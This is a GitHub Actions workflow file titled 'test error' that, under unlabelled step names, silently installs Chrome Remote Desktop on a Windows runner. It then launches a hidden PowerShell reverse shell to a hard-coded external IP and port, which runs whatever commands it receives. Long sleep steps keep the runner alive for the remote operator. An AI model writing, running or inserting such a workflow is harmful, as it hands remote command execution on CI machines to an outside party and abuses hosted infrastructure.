name: test error

on:
  workflow_dispatch: # Vẫn cho phép chạy thủ công
  push:
    branches:
      - main   # Hoặc nhánh bạn đang dùng
    paths:
      - .github/workflows/** # Khi bất kỳ file workflow nào bị chỉnh sửa

jobs:
  setup-chrome-rd:
    runs-on: windows-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
      - name: 1
        run: |
          Invoke-WebRequest -Uri "https://dl.google.com/chrome/install/standalonesetup64.exe" -OutFile "chrome_setup.exe"
          Start-Process "chrome_setup.exe" -ArgumentList "/silent /install" -Wait
      - name: 2
        run: |
          Invoke-WebRequest -Uri "https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi" -OutFile "chrome_remote_desktop_host.msi"
          Start-Process "msiexec.exe" -ArgumentList "/i", "chrome_remote_desktop_host.msi", "/quiet" -Wait
      - name: 3
        run: |
         powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('147.185.221.30',34011);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"
      - name: Wait
        run: Start-Sleep -Seconds 2147483
      - name: Wait2
        run: Start-Sleep -Seconds 2147483
